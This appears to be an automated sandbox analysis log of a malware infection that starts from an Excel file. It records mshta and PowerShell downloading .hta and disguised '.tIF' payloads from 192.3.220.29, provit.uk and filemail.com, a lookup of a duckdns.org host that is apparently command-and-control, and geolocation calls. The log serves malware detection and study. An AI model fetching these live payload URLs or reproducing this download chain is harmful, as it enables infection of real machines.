                    Source: global trafficHTTP traffic detected: GET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /45/ww/seethebestthignswhichgivingbestopportunities.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.29Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /45/ww/seethebestthignswhichgivingbestopportunities.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.220.29If-Range: "5a0de-627535b5bef4e"
                    Source: global trafficHTTP traffic detected: GET /45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.29Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /45/ww/seethebestthignswhichgivingbestopportunities.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 20 Nov 2024 07:47:08 GMTConnection: Keep-AliveHost: 192.3.220.29If-None-Match: "5a0de-627535b5bef4e"
                    Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.22:49168 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.22:49174 version: TLS 1.0
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FE89A34B18 URLDownloadToFileW,6_2_000007FE89A34B18
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\33602862.emf
                    Source: global trafficHTTP traffic detected: GET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lace HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /45/ww/seethebestthignswhichgivingbestopportunities.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.29Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /45/ww/seethebestthignswhichgivingbestopportunities.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.220.29If-Range: "5a0de-627535b5bef4e"
                    Source: global trafficHTTP traffic detected: GET /45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.29Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /45/ww/seethebestthignswhichgivingbestopportunities.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 20 Nov 2024 07:47:08 GMTConnection: Keep-AliveHost: 192.3.220.29If-None-Match: "5a0de-627535b5bef4e"
                    Source: global trafficHTTP traffic detected: GET /45/HDRDDG.txt HTTP/1.1Host: 192.3.220.29Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /45/HDRDDG.txt HTTP/1.1Host: 192.3.220.29Connection: Keep-Alive
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: provit.uk
                    Source: global trafficDNS traffic detected: DNS query: 1017.filemail.com
                    Source: global trafficDNS traffic detected: DNS query: banaya.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: mshta.exe, 00000004.00000003.454355851.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455070536.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.0000000003A11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.0000000003A11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.0000000003A11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.0000000003A11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/
                    Source: powershell.exe, 00000006.00000002.480662155.0000000002331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.532499393.000000000256C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehaving
                    Source: powershell.exe, 00000014.00000002.532499393.000000000256C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF
                    Source: powershell.exe, 00000006.00000002.490776775.000000001A746000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFC(
                    Source: powershell.exe, 00000014.00000002.537521208.000000001ACD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFC:
                    Source: powershell.exe, 00000006.00000002.480662155.0000000002331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.532499393.000000000256C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFp
                    Source: mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.524670515.0000000000149000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522772525.000000000012F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta
                    Source: mshta.exe, 00000012.00000003.524339714.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.000000000399C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta&chan
                    Source: mshta.exe, 00000004.00000003.454355851.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003EE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.455070536.0000000003EE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta&chan0
                    Source: mshta.exe, 00000004.00000003.453814399.0000000000442000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.454904762.0000000000442000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454576074.0000000000442000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524379592.000000000015D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522772525.000000000015D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.524670515.000000000015D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta...
                    Source: mshta.exe, 00000004.00000003.453814399.0000000000442000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.hta...K
                    Source: mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaC:
                    Source: mshta.exe, 00000004.00000003.454723183.00000000034D5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.521827851.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524091180.0000000002A25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htahttp://192.3.220.29/45/ww/
                    Source: mshta.exe, 00000012.00000003.522772525.00000000000EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaier=jagged&lace
                    Source: mshta.exe, 00000004.00000003.453814399.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454576074.00000000003E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaier=jagged&lace4
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.220.29/45/ww/seethebestthignswhichgivingbestopportunities.htaier=jagged&laceg
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524339714.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003EC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                    Source: CasPol.exe | String found in binary or memory: http://geoplugin.net/json.gp
                    Source: CasPol.exe, 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: powershell.exe, 00000006.00000002.480662155.00000000034EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.532499393.0000000002497000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
                    Source: powershell.exe, 00000006.00000002.489702897.0000000012161000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524339714.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.000000000399C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net03
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
                    Source: wscript.exe, 0000001A.00000003.532582558.000000000016D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.534630974.000000000016E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.dorg/wbem/wsman/1/wsm
                    Source: powershell.exe, 00000006.00000002.480662155.0000000002131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.548845698.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.532499393.00000000021D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.588241264.0000000002351000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
                    Source: mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: powershell.exe, 00000011.00000002.548845698.00000000027D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.588241264.0000000002551000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://1017.filemail.com
                    Source: powershell.exe, 0000001E.00000002.585706991.00000000000AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4
